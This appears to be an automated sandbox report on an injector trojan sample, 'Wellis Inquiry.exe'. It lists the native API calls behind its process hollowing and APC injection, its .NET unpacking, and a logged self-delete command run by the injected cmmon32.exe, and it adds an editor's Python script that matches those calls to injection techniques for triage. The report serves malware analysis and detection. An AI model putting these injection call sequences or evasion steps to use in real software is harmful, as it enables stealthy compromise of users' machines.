          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_00401030
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0041C95D
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_00401174
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0041BA2C
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0041CBBB
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_00408C7B
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_00408C80
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_00402D87
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_00402D90
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011BF900
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011D4120
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0128E824
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_01271002
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011DA830
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_012820A8
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011CB090
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011E20A0
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_012828EC
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_01282B28
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011DAB40
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011EEBB0
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0127DBD2
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_012703DA
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0126FA2B
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_012822AE
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_01282D07
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011B0D20
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_01281D55
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011E2581
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_012825DD
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011CD5E0
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011C841F
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0127D466
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_01281FF1
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0128DFCE
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011D6E30
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0127D616
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_01282EF7
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_046FB477
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0479D466
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_046E841F
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04794496
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_047A1D55
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_046D0D20
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_047A2D07
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_046ED5E0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_047A25DD
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04702581
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04792D82
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_046F6E30
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0479D616
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_047A2EF7
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_047A1FF1
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_047ADFCE
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_047AE824
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_046FA830
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04791002
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_047A28EC
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_047020A0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_047A20A8
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_046EB090
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_046F4120
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_046DF900
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_046F99BF
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0478FA2B
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_046FB236
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_04794AEF
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_047A22AE
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_046FAB40
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0477CB4F
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_047A2B28
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_046FA309
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_047823E3
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_047903DA
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0470ABD8
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0479DBD2
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0470EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0470138B
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D3BA2C
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D3CBBB
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D3C95D
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D22FB0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D28C80
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D28C7B
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D22D90
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D22D87
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: String function: 011BB150 appears 54 times
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 046DB150 appears 136 times
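The native-function rows that follow list, for the second Wellis Inquiry.exe instance (process 3), the NT calls behind the injection findings in this report: NtCreateProcessEx, NtUnmapViewOfSection, NtWriteVirtualMemory, NtGetContextThread, NtSetContextThread, NtResumeThread (process hollowing), NtOpenThread and NtQueueApcThread (APC injection), NtCreateSection and NtMapViewOfSection (section mapping into another process). The Python below is an added example by the editor, not part of the report or of Joe Sandbox: it parses rows in the format this page uses ("Code function: <pid>_<stage>_<address> <Api>,<Api>,"), collects the API names per process and tests them against technique profiles. The profiles are the editor's assumption about the minimum call set each technique needs, not the sandbox's own rule logic; the sample rows are copied from this report, and the one cmmon32.exe row without API names is included to show that such rows are skipped.

```python
import re
from typing import Dict, FrozenSet, List, Set, Tuple

# Row format as printed on this page; the " | " before "Code function" is the editor's.
ROW_RE = re.compile(
    r"Code function:\s*(?P<pid>\d+)_(?P<stage>\d+)_(?P<addr>[0-9A-Fa-f]{8})\s*(?P<apis>.*)$"
)

# Technique profiles (editor's assumption): the NT calls a technique cannot do
# without. Extra calls in the trace are ignored; a profile with any call missing
# is reported as incomplete rather than matched.
TECHNIQUE_PROFILES: Dict[str, FrozenSet[str]] = {
    "process hollowing": frozenset({
        "NtUnmapViewOfSection", "NtWriteVirtualMemory",
        "NtSetContextThread", "NtResumeThread",
    }),
    "APC injection": frozenset({"NtOpenThread", "NtQueueApcThread"}),
    "section-mapping injection": frozenset({"NtCreateSection", "NtMapViewOfSection"}),
    "thread-context hijack": frozenset({
        "NtSuspendThread", "NtGetContextThread", "NtSetContextThread", "NtResumeThread",
    }),
}

# Rows copied from this report's native-function findings (process 3 is the
# second Wellis Inquiry.exe instance); the last row has no API names and is skipped.
REPORT_ROWS: List[str] = [
    r"Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_004185E0 NtCreateFile,",
    r"Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F99A0 NtCreateSection,LdrInitializeThunk,",
    r"Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9A20 NtResumeThread,LdrInitializeThunk,",
    r"Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9780 NtMapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F97A0 NtUnmapViewOfSection,LdrInitializeThunk,",
    r"Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9950 NtQueueApcThread,",
    r"Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F99D0 NtCreateProcessEx,",
    r"Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011FB040 NtSuspendThread,",
    r"Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F98A0 NtWriteVirtualMemory,",
    r"Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011FA3B0 NtGetContextThread,",
    r"Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011FAD30 NtSetContextThread,",
    r"Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011FA770 NtOpenThread,",
    r"Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_046FB477",
]


def parse_native_calls(rows: List[str]) -> Dict[str, Set[str]]:
    """Return {process id: set of API names}; rows without a 'Code function'
    cell or without any API names are skipped."""
    calls: Dict[str, Set[str]] = {}
    for row in rows:
        m = ROW_RE.search(row)
        if not m:
            continue
        names = {n.strip() for n in m.group("apis").split(",") if n.strip()}
        if names:
            calls.setdefault(m.group("pid"), set()).update(names)
    return calls


def match_techniques(apis: Set[str]) -> Dict[str, Tuple[Set[str], Set[str]]]:
    """For every profile return (calls present in the trace, calls still missing)."""
    return {name: (set(apis & prof), set(prof - apis)) for name, prof in TECHNIQUE_PROFILES.items()}


def complete_techniques(apis: Set[str]) -> List[str]:
    """Names of the techniques whose whole profile is present, sorted."""
    return sorted(name for name, (_, missing) in match_techniques(apis).items() if not missing)


def summarize(rows: List[str]) -> Dict[str, List[str]]:
    """Per process id, the fully matched techniques."""
    return {pid: complete_techniques(apis) for pid, apis in parse_native_calls(rows).items()}


if __name__ == "__main__":
    for pid, techniques in summarize(REPORT_ROWS).items():
        print(f"process {pid}: {', '.join(techniques) or 'no complete profile'}")
```

On the report rows, process 3 satisfies all four profiles, which matches the hollowing, APC and section-mapping findings in the Signatures overview. The partial view from match_techniques is the useful one during triage: a trace with NtQueueApcThread but no NtOpenThread is reported with the missing call rather than silently dropped, which is the kind of gap a hooked or substituted ntdll image produces in a sandbox trace.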
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_004185E0 NtCreateFile,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_00418690 NtReadFile,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_00418710 NtClose,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_004187C0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_004185DA NtCreateFile,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0041868A NtReadFile,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0041870A NtClose,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011FB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011FA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011FAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9560 NtWriteFile,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011FA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011FA770 NtOpenThread,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_011F9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047195D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047196D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0471AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047195F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0471A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0471A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047197A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0471B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047198F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047198A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047199D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04719B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0471A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D38690 NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D387C0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D38710 NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D385E0 NtCreateFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D3868A NtReadFile,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D3870A NtClose,
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_02D385DA NtCreateFile,
          Source: Wellis Inquiry.exeBinary or memory string: OriginalFilename vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exe, 00000000.00000002.673472401.00000000083A0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameriched20.dllp( vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exe, 00000000.00000002.670890366.0000000003341000.00000004.00000001.sdmpBinary or memory string: m,\\StringFileInfo\\000004B0\\OriginalFilename vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exeBinary or memory string: OriginalFilename vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exe, 00000003.00000002.747172824.00000000031A9000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exe, 00000003.00000002.746125583.00000000012AF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exeBinary or memory string: OriginalFilenameMutexAccessRu.exe8 vs Wellis Inquiry.exe
          Source: Wellis Inquiry.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Wellis Inquiry.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Wellis Inquiry.exe 'C:\Users\user\Desktop\Wellis Inquiry.exe'
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess created: C:\Users\user\Desktop\Wellis Inquiry.exe C:\Users\user\Desktop\Wellis Inquiry.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeProcess created: C:\Users\user\Desktop\Wellis Inquiry.exe C:\Users\user\Desktop\Wellis Inquiry.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Wellis Inquiry.exe'
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wellis Inquiry.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@9/6
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6796:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Wellis Inquiry.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Wellis Inquiry.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: Wellis Inquiry.exe, 00000003.00000002.747156139.00000000031A0000.00000040.00020000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: Wellis Inquiry.exe, 00000003.00000002.747156139.00000000031A0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Wellis Inquiry.exe, 00000003.00000002.746125583.00000000012AF000.00000040.00000001.sdmp, cmmon32.exe, 0000000B.00000002.922767322.00000000046B0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Wellis Inquiry.exe, cmmon32.exe

          Data Obfuscation:

.NET source code contains potential unpacker
Source: Wellis Inquiry.exe, WinUsbInitForm.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.Wellis Inquiry.exe.ff0000.0.unpack, WinUsbInitForm.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.Wellis Inquiry.exe.ff0000.0.unpack, WinUsbInitForm.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.Wellis Inquiry.exe.6a0000.0.unpack, WinUsbInitForm.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.2.Wellis Inquiry.exe.6a0000.1.unpack, WinUsbInitForm.cs | .Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0041B822 push eax; ret
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0041B82B push eax; ret
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_004160E3 push 21204C73h; retf
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0041B88C push eax; ret
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_004091C6 push eax; ret
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_00416278 push ebp; ret
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0041621F push ebp; ret
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0040EE6C push edx; ret
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_00415EAC push FFFFFFABh; iretd
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0041B7D5 push eax; ret
Source: C:\Users\user\Desktop\Wellis Inquiry.exe | Code function: 3_2_0120D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_0472D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D36278 push ebp; ret
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D3621F push ebp; ret
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D360E3 push 21204C73h; retf
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D3B88C push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D3B822 push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D3B82B push eax; ret
Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 11_2_02D291C6 push eax; ret
